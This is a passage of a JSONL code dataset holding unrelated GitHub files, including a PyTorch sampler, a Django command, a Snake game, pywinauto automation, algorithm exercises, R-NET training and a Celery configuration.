\"\"\"\n dtype = pytorch_config.dtype\n device = pytorch_config.device\n\n if covariance_matrix is None:\n # Assume identity covariance matrix.\n return torch.randn(n, d, dtype = dtype, device = device)\n\n if list(covariance_matrix.shape) != [d, d]:\n raise ValueError(\"The covariance Matrix should be \" \\\n + str(d) + \" x \" + str(d) + \".\")\n\n mean = torch.zeros(d, dtype = dtype, device = device)\n covariance_matrix = torch.tensor(\n covariance_matrix, device = device, dtype = dtype)\n\n multivar_norm = torch.distributions.MultivariateNormal(\n covariance_matrix = covariance_matrix, loc = mean)\n\n samples = torch.zeros(n, d, device = device, dtype = dtype)\n # The below way to filling up the dataset is to save cuda memory.\n # torch multivariate normal rng somehow uses up too much memory.\n for i in range(n):\n samples[i,:] = multivar_norm.rsample((1,))\n\n return samples\n\n","repo_name":"TomasVaskevicius/implicit_sparsity_neurips2019","sub_path":"code/core/data/gaussian_covariates.py","file_name":"gaussian_covariates.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"} +{"seq_id":"27849946368","text":"from django.core.management.base import BaseCommand\nfrom planning.src.Composer import Composer\nfrom planning.models import MessageQueue, Parameters\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n message_queue = MessageQueue.object.filter(state='pending')\n for message in message_queue:\n if message:\n composer = Composer(message)\n try:\n date_student = Parameters.object.filter(key='date_student').get(message=message.id).value\n except Parameters.DoesNotExist:\n date_student = False\n try:\n date_profesor = Parameters.object.filter(key='date_profesor').get(message=message.id).value\n except Parameters.DoesNotExist:\n date_profesor = False\n try:\n type_guard = Parameters.object.filter(key='guard').get(message=message.id).value\n except (Parameters.MultipleObjectsReturned, Parameters.DoesNotExist):\n type_guard = False\n algorithm_student = Parameters.object.filter(key='alg_student').filter(message=message.id)\n algorithm_profesor = Parameters.object.filter(key='alg_profesor').filter(message=message.id)\n\n guard = composer.compose(algorithm_profesor, algorithm_student, type_guard, date_profesor, date_student)\n\n if -1 not in guard:\n message.percent = 100\n message.state = 'processed'\n message.save()\n else:\n message.state = 'error'\n message.save()\n\n","repo_name":"aanunez96/automatic-scheduling-tool-on-call-with-various-algorithms","sub_path":"api/planning/management/commands/generateguard.py","file_name":"generateguard.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"14653403544","text":"string = 'aaaa'\n\ndef pairStar(a):\n if len(a) == 0:\n return\n if len(a) == 1:\n return a\n if a[0] == a[1]:\n return a[0] + '*' + pairStar(a[1:])\n else:\n return a[0] + pairStar(a[1:])\n \nprint(pairStar(string))\n# output: 'a*a*a*a'\n","repo_name":"Neon2k2/PythonDSA","sub_path":"Recursion/Assignment/AddingStar.py","file_name":"AddingStar.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"41605116027","text":"import glob\nimport argparse\nimport pysam\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas 
as pd\n\n\ndef get_reads_mapped(bamfile):\n\n\tbamfile = pysam.AlignmentFile(bamfile, 'rb')\n\tref_reads_mapped = {}\n\t#Get reads mapped to each reference\n\tfor genome in bamfile.references:\n\t\tgenome_id = genome.split(\"_\")[-1]\n\t\treads_mapped = sum(1 for read in bamfile.fetch(genome))\n\t\tref_reads_mapped[genome_id] = reads_mapped\n\t\n\treturn ref_reads_mapped\n\n\ndef plot_hits_heatmap(hits_by_sample_df):\n\n\tfig, ax = plt.subplots(1,1, figsize=(6,5))\n\tsns.heatmap(hits_by_sample_df, cmap='YlGnBu', robust=True, ax=ax)\n\tplt.tight_layout()\n\tfig.savefig('marref_prophages_tara_oceans_heatmap.pdf')\n\t\n\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser(description='Parse indexed bam files and generate heatmap of hits per sample to the reference sequences')\n\tparser.add_argument('bamfile_dir', help='Directory with the indexed bamfiles to parse')\n\targs = parser.parse_args()\n\t\n\t#Get hits to reference genomes for each sample\n\thits_per_sample = {}\n\tfor bamfile in glob.glob(args.bamfile_dir + \"/*.bam\"):\n\t\tsample = bamfile.split(\"/\")[-1][:-4]\n\t\thits = get_reads_mapped(bamfile)\n\t\thits_per_sample[sample] = hits\n\n\t#Combine hits for each sample into a dataframe\n\thits_per_sample_df = pd.DataFrame.from_dict(hits_per_sample)\n\tprint(hits_per_sample_df.head())\n\n\t#Plot heatmap of hits to reference sequences for all samples\n\tplot_hits_heatmap(hits_per_sample_df)\n\n","repo_name":"taylor-oconnell/marine-prophage-hunting","sub_path":"parse_samfiles.py","file_name":"parse_samfiles.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"73371427823","text":"import cv2\n\nclass MyImage:\n def __init__(self, img_name, optional=0):\n self.img = img_name\n self.__name = img_name\n\n def __str__(self):\n return self.__name\n\n\nclass VerifySignature:\n def __init__(self, obj1, obj2):\n self.img1 = MyImage(obj1, 0) # queryImage\n self.img2 = MyImage(obj2, 0) # trainImage\n\n def find(self):\n\n self.img1.img = cv2.cvtColor(self.img1.img, cv2.COLOR_BGR2GRAY)\n self.img2.img = cv2.cvtColor(self.img2.img, cv2.COLOR_BGR2GRAY)\n\n # =============================================================\n # figure, ax = plt.subplots(1, 2, figsize=(16, 8))\n #\n # ax[0].imshow(img1.img, cmap='gray')\n # ax[1].imshow(img2.img, cmap='gray')\n # ==================================================================\n\n # Initiate SIFT detector\n sift = cv2.SIFT_create()\n\n # find the keypoints and descriptors with SIFT\n kp1, des1 = sift.detectAndCompute(self.img1.img, None)\n kp2, des2 = sift.detectAndCompute(self.img2.img, None)\n\n # BFMatcher with default params\n bf = cv2.BFMatcher()\n matches = bf.knnMatch(des1, des2, k=2)\n\n # Apply ratio test\n good = []\n good_without_list = []\n for m, n in matches:\n if m.distance < 0.65 * n.distance:\n good.append([m])\n good_without_list.append(m)\n\n if len(good) >= 8:\n return True\n else:\n return False\n","repo_name":"viveknimbolkar/cheque-detection","sub_path":"model/signature_verification.py","file_name":"signature_verification.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"13306380747","text":"import os\nimport sys\n\n#\n# (C) Copytight 2017 Marek Bielawski\n# addClass\n#\n\nnewLine = str('\\n')\n\ndef sexyComment(lines) :\n out = '/*' + newLine\n for line in lines:\n out += ' * ' + line + newLine\n out += ' */' 
+ newLine\n return out\n\nif len( sys.argv ) < 2:\n print( \"too few arguments\" )\n quit()\nparamName = sys.argv[1];\nparamArr = paramName.split('::')\n\nhPath = 'Code/' + '/'.join(paramArr) + '.h'\ncppPath = 'Code/' + '/'.join(paramArr) + '.cpp'\nif os.path.isfile( hPath ) or os.path.isfile(cppPath) :\n print ( \"class {} allready eists\".format(paramName) )\n quit()\nclassName = paramArr[-1] \nnamespaceArr = paramArr[:-1]\nnamespaceStart = ''\nnamespaceEnd = newLine\nguardName = '_'.join(paramArr).upper() + \"_DEF\"\nfor namespace in namespaceArr:\n namespaceStart += 'namespace ' + namespace + ' {' + newLine\n namespaceEnd += '}' + newLine\nclassStart = 'class ' + className + newLine + '{' + newLine\nclassEnd = '};' + newLine\ncomment = sexyComment([\n \"(C) Copytight 2017 Marek Bielawski\",\n paramName\n ])\ninclude = \"#include <\" + '/'.join(paramArr) + '.h>' + newLine\nheaderContent = \"#ifndef \" + guardName + newLine + \"#define \" + guardName + newLine\nheaderContent += comment + namespaceStart + newLine\nheaderContent += classStart + classEnd + namespaceEnd + \"#endif\" + newLine\n \ncppContent = include + comment + namespaceStart + newLine + namespaceEnd\nhFile = open(hPath, \"w\")\ncppFile = open(cppPath, \"w\")\nhFile.write(headerContent)\ncppFile.write(cppContent)\nhFile.close()\ncppFile.close()\n\n","repo_name":"mare85/code","sub_path":"Game1/scripts/addClass.py","file_name":"addClass.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"12713701112","text":"# -*-coding:utf-8-*-\r\n# by Alan_Correa\r\n\r\nimport pygame\r\nfrom pygame.locals import*\r\nfrom random import randint\r\nimport ctypes\r\n\r\nctypes.windll.kernel32.FreeConsole()\r\n\r\ndef on_grid_random():\r\n x = randint(0, 590)\r\n y = randint(0, 590)\r\n return (x//10 * 10, y//10 * 10)\r\n\r\ndef collision_apple(c1, c2):\r\n return (c1[0] == c2[0] and c1[1] == c2[1])\r\n\r\nUP = 0\r\nRIGHT = 1\r\nDOWN = 2\r\nLEFT = 3\r\n\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((600, 600))\r\npygame.display.set_caption(\"Snake\")\r\n\r\nsnake = [(200, 200), (210, 200), (220, 200)]\r\nsnake_skin = pygame.Surface((10, 10))\r\nsnake_skin.fill((255, 255, 255))\r\n\r\napple_pos = on_grid_random()\r\napple = pygame.Surface((10, 10))\r\napple.fill((255, 0, 0))\r\n\r\nfont = pygame.font.SysFont('Arial', 18)\r\ntext = font.render('Você Perdeu!', True, (0, 255, 0))\r\ntextRect = text.get_rect()\r\ntextRect.center = (600//2, 600//2)\r\n\r\nhight_pad = pygame.Rect(0, -10, 600, 0)#cima\r\nleft_pad = pygame.Rect(600, 0, 610, 600)#esquerda\r\ndown_pad = pygame.Rect(0, 600, 600, 610)#baixo\r\nright_pad = pygame.Rect(-10, 0, 0, 600)#direita\r\npads = (hight_pad, left_pad, down_pad, right_pad)\r\n\r\nmy_direction = LEFT\r\nclock = pygame.time.Clock()\r\n\r\nwhile True:\r\n clock.tick(20)\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n \r\n if event.type == KEYDOWN:\r\n if event.key == K_UP:\r\n my_direction = UP\r\n if event.key == K_DOWN:\r\n my_direction = DOWN\r\n if event.key == K_RIGHT:\r\n my_direction = RIGHT\r\n if event.key == K_LEFT:\r\n my_direction = LEFT\r\n if collision_apple(snake[0], apple_pos):\r\n apple_pos = on_grid_random()\r\n snake.append((0, 0))\r\n \r\n head = pygame.Rect(snake_skin.get_clip())\r\n if head.collidelist(pads) >= 0:\r\n pygame.quit()\r\n \r\n for i in range(len(snake) - 1, 0, -1):\r\n snake[i] = (snake[i-1][0], snake[i-1][1])\r\n \r\n if my_direction == 
UP:\r\n snake[0] = (snake[0][0], snake[0][1] - 10)\r\n if my_direction == DOWN:\r\n snake[0] = (snake[0][0], snake[0][1] + 10)\r\n if my_direction == RIGHT:\r\n snake[0] = (snake[0][0] + 10, snake[0][1])\r\n if my_direction == LEFT:\r\n snake[0] = (snake[0][0] - 10, snake[0][1])\r\n \r\n screen.fill((0, 0, 0))\r\n screen.blit(apple, apple_pos)\r\n print(apple_pos)\r\n for pos in snake:\r\n screen.blit(snake_skin, pos)\r\n pygame.display.update()\r\n","repo_name":"AlanSouza-19/Snake","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"19700593974","text":"from subprocess import Popen\nfrom pywinauto import Desktop\nfrom pywinauto import Application\nimport pyautogui\nimport pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\nfrom pywinauto.application import Application\nimport time\nimport csv\nimport os\nimport sys\nimport pywinauto\nfrom datetime import datetime\n\n\nfrom functions.functions_utils import tm_init\n\n## get the appliation handler from the init function\ntempla = tm_init()[0]\napp = tm_init()[1]\n\n## start \ntempla.child_window(title='Product List', control_type='TabItem').click_input()\nmainProductsWindow = templa.child_window(title='Product List', control_type='Window')\n\n########################\n#\n# Setup Excel Sheet\n#\n########################\nsheetLoader = 'Add Product' \ndf = pd.read_excel('test.xlsx', sheet_name=sheetLoader)\nprint(\"starting...\")\n\nfor i in df.index:\n productCode = df['PRODUCT-CODE']\n category = df['CATEGORY']\n supplierCode = df['SUPPLIER-CODE']\n supplierCodeRe = df['SUPPLIER-CODE-RE']\n itemName = df['ITEMS']\n cost = df['COST']\n salePrice = df['SALE PRICE']\n clientName = df['CLIENT NAME']\n status = df['STATUS']\n prefer = df['PREFERRED']\n unit = df['UNIT']\n preferString = str(int(prefer[i]))\n\n if status[i] == \"Done\" or status[i] == \"Skip\":\n print(str(productCode[i]) + \" is Done\")\n continue\n\n if status[i] == \"Stop\":\n print(\"Stop here\")\n break\n\n\n\n # # If the product exists\n # # click on the \"Code\" Edit Box\n # mainProductsWindow.window(title='Code', control_type='ComboBox').click_input()\n # pyautogui.typewrite(str(productCode[i]))\n\n # click on the \"Product group\" Edit Box\n # print(\"select product group...\")\n # mainProductsWindow.window(title='Product group', control_type='ComboBox').click_input()\n # pyautogui.typewrite(category[i])\n # pyautogui.moveRel(20, 25) \n # pyautogui.click()\n # templa.child_window(title=\"Copy\", control_type=\"Button\").click_input()\n # print(\"copied one product..\")\n\n\n\n\n\n # # click on the Code Edit Box\n # mainProductsWindow.window(title='Code', control_type='ComboBox').click_input()\n # pyautogui.typewrite(str(productCode[i]))\n\n # # if no product showing, then click on clear fileter button\n # # and try next one\n # productItem = mainProductsWindow.child_window(title=str(productCode[i]), control_type=\"DataItem\")\n # if productItem.exists():\n # # click clear button\n # print (str(productCode[i]) + \" Exist\")\n # mainProductsWindow.window(title='Description', control_type='ComboBox').click_input()\n \n # else: \n # print (str(productCode[i]) + \" Product not exist, continue...\")\n # #\n\n # #######################################\n # #\n # # Copy old Products\n # #\n # #######################################\n # # click on other textbox first to deselect text\n # 
mainProductsWindow.window(title='Description', control_type='ComboBox').click_input()\n\n\n\n # indent once below\n\n # click on the Code Edit Box\n mainProductsWindow.window(title='Code', control_type='ComboBox').click_input()\n \n #######################################\n #\n # Setup Copied Product Code\n #\n #######################################\n\n # Setup Copied Product Code.\n # if not all the same setup in Excel Sheet\n # for example copy product CODE URB120\n existingCode = str(productCode[i])\n pyautogui.typewrite(existingCode)\n mainProductsWindow.child_window(title=existingCode, control_type=\"DataItem\").click_input()\n\n\n\n\n\n # Click COPY to copy the product\n templa.child_window(title=\"Copy\", control_type=\"Button\").click_input()\n\n productDetailWindow = app.window(title_re='Products - *')\n productDetailWindow.wait('exists', timeout=15)\n\n #productDetailWindow.print_control_identifiers()\n # Type code\n productDetailWindow.child_window(auto_id=\"txtCode\", control_type=\"Edit\").click_input()\n pyautogui.typewrite(productCode[i])\n\n # just tab will select all text, no need to clear manually\n pyautogui.press('tab')\n pyautogui.typewrite(itemName[i])\n\n print(\"general info filled\")\n ###################################\n # \n # Need add Product code in the first page\n #\n ###################################\n \n # Go to Price Group, change selling price\n productDetailWindow.window(title='Price groups', control_type='TabItem').click_input()\n # find the Client Name\n priceGroupTextBox = productDetailWindow.child_window(title=clientName[i], control_type=\"DataItem\")\n FixedPriceTextBox = priceGroupTextBox.child_window(title=\"Fixed price\", control_type=\"Edit\")\n FixedPriceTextBox.click_input()\n pyautogui.typewrite(str(salePrice[i]))\n print (\"Sale Price is: \" + str(salePrice[i]))\n\n\n # then change the cost price\n productDetailWindow.window(title='Suppliers', control_type='TabItem').click_input()\n\n supplierEntry = productDetailWindow.child_window(title_re=supplierCodeRe[i])\n if not supplierEntry.exists():\n productDetailWindow.Add.click_input()\n print (\"supplier not exist in the list\")\n # open new supplier detail window\n productSupplierWindow = productDetailWindow.child_window(title_re='Product suppliers - *')\n productSupplierWindow.wait('exists', timeout=15)\n # add supplier name by code\n # the supplier text box is focused by default\n print (\"add supplier\")\n pyautogui.typewrite(supplierCode[i])\n pyautogui.press('tab')\n preferredCheckbox = productSupplierWindow.child_window(auto_id=\"chkIsPreferredSupplier\", control_type=\"CheckBox\")\n isChecked = preferredCheckbox.get_toggle_state()\n\n # check if match with Excel sheet data\n if str(isChecked) != preferString:\n preferredCheckbox.toggle()\n # you can also use tab tab to go down\n pyautogui.press('tab')\n pyautogui.press('tab')\n pyautogui.typewrite(str(productCode[i]))\n pyautogui.press('tab')\n # check prefer checkbox\n # add/change price\n #productSupplierWindow.child_window(auto_id=\"numUnitCost\", control_type=\"Edit\").click_input()\n pyautogui.typewrite(str(cost[i]))\n print (\"Buying Price entered: \" + str(cost[i]))\n\n else: \n # open specific supplier item\n supplierEntry.click_input(button='left', double=True)\n productSupplierWindow = productDetailWindow.child_window(title_re='Product suppliers - *')\n productSupplierWindow.wait('exists', timeout=15)\n # add/change price\n productSupplierWindow.child_window(auto_id=\"numUnitCost\", control_type=\"Edit\").click_input()\n 
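# the unit-cost edit box now has focus, so type the buying cost from the spreadsheet row\n            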
pyautogui.typewrite(str(cost[i]))\n pyautogui.keyDown('shift')\n pyautogui.press('tab')\n pyautogui.keyUp('shift')\n pyautogui.typewrite(str(productCode[i]))\n\n pyautogui.press('tab')\n\n # Save\n productSupplierWindow.Accept.click_input()\n pyautogui.PAUSE = 2.5\n productDetailWindow.Save.click_input()\n pyautogui.PAUSE = 2.5\n print (str(productCode[i]) + \" is Done now\")\n\nprint (\"###################################\")\nprint (\" \")\n\n\n\n \n\n\n","repo_name":"allan-2stars/Templa-Auto","sub_path":"ProductCopy.py","file_name":"ProductCopy.py","file_ext":"py","file_size_in_byte":7178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20422754061","text":"from struct import pack\n\nimport ncs\nimport ncs.maapi as maapi\nimport ncs.maagic as maagic\n\ndef is_ha_master_or_no_ha():\n with maapi.single_read_trans(\"\", \"system\", db=ncs.OPERATIONAL) as trans:\n if trans.exists(\"/tfnm:ncs-state/tfnm:ha\"):\n mode = str(maagic.get_node(trans, '/tfnm:ncs-state/tfnm:ha/tfnm:mode'))\n return (mode == 'master')\n else:\n return True\n\ndef is_ha_slave():\n with maapi.single_read_trans(\"\", \"system\", db=ncs.OPERATIONAL) as trans:\n if trans.exists(\"/tfnm:ncs-state/tfnm:ha\"):\n mode = str(maagic.get_node(trans,\n '/tfnm:ncs-state/tfnm:ha/tfnm:mode'))\n return (mode == 'slave' or mode == 'relay-slave')\n return False\n\ndef IPNetwork(network):\n addr = str(network).split('/')\n if ':' in network:\n return IPv6Network(address = addr[0], prefix_len = addr[1])\n else:\n return IPv4Network(address = addr[0], prefix_len = addr[1])\n\nclass IPv4Network:\n def __init__(self, address, prefix_len):\n IPV4LENGTH = 32\n self._ALL_ONES = pow(2, IPV4LENGTH) - 1\n self.version = 'ipv4'\n self.address = address\n self.subnet_mask = self._create_subnet_mask(prefix_len)\n\n def _create_subnet_mask(self, prefix_len_str):\n ipint = self._ALL_ONES ^ (self._ALL_ONES >> int(prefix_len_str))\n octets = []\n for _ in xrange(4):\n octets.insert(0, str(ipint & 0xFF))\n ipint >>= 8\n return '.'.join(octets)\n\nclass IPv6Network:\n def __init__(self, address, prefix_len):\n IPV6LENGTH = 128\n self._ALL_ONES = pow(2, IPV6LENGTH) - 1\n self.version = 'ipv6'\n self.address = address\n self.subnet_mask = self._create_subnet_mask(prefix_len)\n\n def _create_subnet_mask(self, prefix_len_str):\n ipint = self._ALL_ONES ^ (self._ALL_ONES >> int(prefix_len_str))\n hex_str = '%032x' % ipint\n hextets = []\n for x in range(0, 32, 4):\n hextets.append('%x' % int(hex_str[x:x+4], 16))\n return ':'.join(self._compress_hextets(hextets))\n\n def _compress_hextets(self, hextets):\n best_doublecolon_start = -1\n best_doublecolon_len = 0\n doublecolon_start = -1\n doublecolon_len = 0\n for index in range(len(hextets)):\n if hextets[index] == '0':\n doublecolon_len += 1\n if doublecolon_start == -1:\n # Start of a sequence of zeros.\n doublecolon_start = index\n if doublecolon_len > best_doublecolon_len:\n # This is the longest sequence of zeros so far.\n best_doublecolon_len = doublecolon_len\n best_doublecolon_start = doublecolon_start\n else:\n doublecolon_len = 0\n doublecolon_start = -1\n\n if best_doublecolon_len > 1:\n best_doublecolon_end = (best_doublecolon_start +\n best_doublecolon_len)\n # For zeros at the end of the address.\n if best_doublecolon_end == len(hextets):\n hextets += ['']\n hextets[best_doublecolon_start:best_doublecolon_end] = ['']\n # For zeros at the beginning of the address.\n if best_doublecolon_start == 0:\n hextets = [''] + hextets\n return 
hextets\n\ndef is_notif_handling_required():\n with maapi.single_read_trans(\"\", \"system\", db=ncs.RUNNING) as trans:\n if trans.exists(\"/nfvo-rel2:nfvo/nfvo-rel2-esc:settings-esc\"):\n handling_required = str(trans.get_elem(\"/nfvo-rel2:nfvo/nfvo-rel2-esc:settings-esc/nfvo-rel2-esc:netconf-subscription/nfvo-rel2-esc:default-subscriber\"))\n if 'true' == handling_required:\n return True\n else:\n return False\n","repo_name":"rishan02/packages-nfv-3.4.5","sub_path":"tailf-etsi-rel2-nfvo-esc/python/tailf_etsi_rel2_nfvo_esc/internal_utils.py","file_name":"internal_utils.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"39306255639","text":"# pylint: disable= missing-module-docstring, missing-function-docstring\nfrom os import environ\nfrom unittest.mock import patch\nfrom environ import to_config\nfrom goals.config import AppConfig\n\n\n@patch.dict(environ, {}, clear=True)\ndef test_when_environment_is_empty_expect_9001_prometheus_port():\n cnf = to_config(AppConfig)\n assert cnf.prometheus_port == 9001\n\n\n@patch.dict(environ, {}, clear=True)\ndef test_when_environment_is_empty_expect_warning_log_level():\n cnf = to_config(AppConfig)\n assert cnf.log_level == \"WARNING\"\n\n\n@patch.dict(environ, {\"GOALS_PROMETHEUS_PORT\": \"9004\"}, clear=True)\ndef test_when_environment_has_prometheus_port_9004_expect_9004():\n cnf = to_config(AppConfig)\n assert cnf.prometheus_port == 9004\n\n\n@patch.dict(environ, {\"GOALS_LOG_LEVEL\": \"DEBUG\"}, clear=True)\ndef test_when_environment_debug_log_level_expect_debug():\n cnf = to_config(AppConfig)\n assert cnf.log_level == \"DEBUG\"\n\n\n@patch.dict(environ, {}, clear=True)\ndef test_when_environment_sentry_enabled_is_not_set_expect_false():\n cnf = to_config(AppConfig)\n assert not cnf.sentry.enabled\n\n\n@patch.dict(\n environ, {\"GOALS_SENTRY_ENABLED\": \"true\"}, clear=True\n)\ndef test_when_environment_sentry_enabled_is_true_expect_true():\n cnf = to_config(AppConfig)\n assert cnf.sentry.enabled\n\n\n@patch.dict(environ, {}, clear=True)\ndef test_when_sentry_dsn_is_empty_expect_localhost():\n cnf = to_config(AppConfig)\n assert cnf.sentry.dsn == \"https://token@sentry.ingest.localhost\"\n\n\n@patch.dict(\n environ,\n {\"GOALS_SENTRY_DSN\": \"https://wf313c@24t2tg2g.ingest.sentry.io/33433\"},\n clear=True\n)\ndef test_when_sentry_dsn_has_sentry_url_expect_it():\n cnf = to_config(AppConfig)\n assert cnf.sentry.dsn == \"https://wf313c@24t2tg2g.ingest.sentry.io/33433\"\n","repo_name":"Taller-2-FIUBA/goals","sub_path":"tests/config_test.py","file_name":"config_test.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"19180027945","text":"\"\"\"\nGiven an array of non-negative integers, and a value sum, determine if there is a subset of the given set with sum equal to given sum. 
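This is the classic 0/1 subset-sum decision problem; the solution below fills an (N+1) x (sum+1) boolean DP table.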
\n\n\nExample 1:\n\nInput:\nN = 6\narr[] = {3, 34, 4, 12, 5, 2}\nsum = 9\nOutput: 1 \nExplanation: Here there exists a subset with\nsum = 9, 4+3+2 = 9.\n\"\"\"\n\n\n\n\n \nclass Solution:\n def isSubsetSum (self, N, arr, sum):\n # code here \n t = [[0 for j in range(sum + 1)] for i in range(N + 1)]\n # Initialization \n for i in range(N + 1):\n for j in range(sum + 1):\n if(i == 0):\n t[i][j] = False\n if(j == 0):\n t[i][j] = True\n \n for i in range(1, N + 1):\n for j in range(1, sum + 1):\n if(arr[i - 1] <= j):\n t[i][j] = t[i-1][j-arr[i - 1]] or t[i-1][j]\n #DP[i][j] = DP[i-1][j] OR DP[i-1][j-A[i-1]]\n else:\n t[i][j] = t[i-1][j]\n \n return t[N][sum]\n \n \n \n \n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__': \n t = int (input ())\n for _ in range (t):\n N = int(input())\n arr = input().split()\n for itr in range(N):\n arr[itr] = int(arr[itr])\n sum = int(input())\n\n ob = Solution()\n if ob.isSubsetSum(N,arr,sum)==True:\n print(1)\n else :\n print(0)","repo_name":"shu3102/practice","sub_path":"DP/subsetSumProblem.py","file_name":"subsetSumProblem.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"71487037744","text":"import numpy as np\nimport argparse\nfrom f1_score4sentence import f1_scores\nimport keras\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\nimport pickle\n\nfrom model3_fit_generator_test import RNet\nfrom generators import data_generator\nimport sys\nsys.setrecursionlimit(100000)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--hdim', default=128, help='Model to evaluate', type=int)\nparser.add_argument('--batch_size', default=64, help='Batch size', type=int)\nparser.add_argument('--nb_epochs', default=50, help='Number of Epochs', type=int)\n#parser.add_argument('--optimizer', default='Adadelta', help='Optimizer', type=str)\nparser.add_argument('--optimizer', default='Adam', help='Optimizer', type=str)\nparser.add_argument('--lr', default=None, help='Learning rate', type=float)\nparser.add_argument('--name', default='', help='Model dump name prefix', type=str)\nparser.add_argument('--loss', default='sparse_categorical_crossentropy', help='Loss', type=str)\n\nparser.add_argument('--dropout', default=0, type=float)\nparser.add_argument('--char_level_embeddings', action='store_true')\n\n# parser.add_argument('model', help='Model to evaluate', type=str)\nargs = parser.parse_args()\n\n\nprint('Loading datasets...', end='')\ndatas = data_generator('../../train_process_final_fasttext.pkl', args.batch_size, val_rate=0.1)\nprint('Creating the model...', end='')\nmodel = RNet(hdim=args.hdim, dropout=args.dropout, p_length=170, q_length=35,\n char_level_embeddings=args.char_level_embeddings)\nprint('Done!')\n\nprint('Compiling Keras model...', end='')\noptimizer_config = {'class_name': args.optimizer,\n 'config': {'lr': args.lr} if args.lr else {}}\n\nf1_ = f1_scores()\nmodel.compile(optimizer=optimizer_config,\n loss=args.loss,\n metrics=['accuracy'])\nprint('Done!')\n\nprint('Training...', end='')\n\npath = 'models_fasttext/' + args.name + '{epoch}-t{loss}-v{val_loss}_fit_generator.model'\n\n\ncall_backs = [ModelCheckpoint(path, verbose=1, save_best_only=True),\n EarlyStopping(monitor='val_loss', patience=5), f1_]\n\n## model fit_generator\nvalx, valy = datas.val_generator()\nmodel.fit_generator(generator=datas.train_generator(), \n steps_per_epoch=datas.train_steps,\n validation_data=(valx, valy),\n 
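# the validation data is the full in-memory split returned by val_generator, so one validation step is enough\n                    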
validation_steps=1,\n epochs=30,\n callbacks=call_backs)\n\n#model.save('./models_fasttext/Final_model_fit_generator.h5')\n\nprint('Training Done!')\n","repo_name":"jasonluo-tw/ChineseQA","sub_path":"R-NET-Keras/train_fit_generator_test.py","file_name":"train_fit_generator_test.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"8781792599","text":"# https://leetcode.com/problems/valid-triangle-number/\nfrom itertools import combinations\nimport bisect\nclass Solution:\n # gets a TLE since we're generating all combinations\n def triangleNumber2(self, nums: List[int]) -> int:\n count = 0\n \n for c in combinations(nums, 3):\n # 3 sides of the triangle\n x = c[0]\n y = c[1]\n z = c[2]\n \n if x + y > z and y + z > x and z + x > y:\n count +=1\n \n return count\n\n # time complexity is n^2 logn\n # n^2 since we're doing 2 for loops, and logn because of binary search\n def triangleNumber(self, nums: List[int]) -> int:\n count = 0\n nums.sort()\n # since input can have 0, and a side of a triangle cannot be 0, we ignore 0s\n nums = [x for x in nums if x != 0]\n \n n = len(nums)\n \n for i in range(0, n):\n for j in range(i+1, n):\n # i is the 1st side, j is second side, which can start from i+1\n # k is 3rd side, which can start from i+2\n # now k can increase beyond i+2 theoretically up till n-1\n\n # because nums is sorted with positive integers\n # we use binary search to find the max index of k, such that\n # nums[i] + nums[j] > nums[k] -- this is a condition for a valid triangle\n \n # in general, the valid condition is sum of any 2 sides > 3rd side\n # we don't care for nums[j] + nums[k] > nums[i] or nums[i] + nums[k] > nums[j]\n # why? because nums is sorted and those 2 conditions are auto satisfied\n k = bisect.bisect_left(nums, nums[i] + nums[j])\n \n # ie, all triangles for fixed i,j and maximum ks are counted toward the answer\n # say if input was [6,10,11,12,13,14,15,16,20] and i=0, j=1, ie, 6 and 10\n # then side k can be 11, 12, 13, 14, 15, ie, max k can be index of 15, ie, k=6\n # note that bisect left above will give value 7, that is why we do k-1 below\n count += (k-1)-j\n \n return count","repo_name":"abhisha1991/LeetCodePractice","sub_path":"Python/ValidTriangleNumber.py","file_name":"ValidTriangleNumber.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40145479065","text":"# -*- coding:utf-8 -*-\r\n__author__ = 'wenhao Yin '\r\n__copyright__ = 'Copyright 2016 wenhao'\r\n\r\n'''\r\n mqtt Worker: handle mqtt messages and put them to mongodb\r\n\r\n'''\r\n\r\nfrom celery import Celery\r\nimport config\r\n\r\n\r\napp = Celery('celeryTasks',\r\n broker='pyamqp://guest@localhost//',\r\n include=['celeryTasks.tasks', 'celeryTasks.repeatTasks'])\r\napp.config_from_object(config)\r\napp.conf.task_routes = {'celeryTasks.repeatTasks.*': 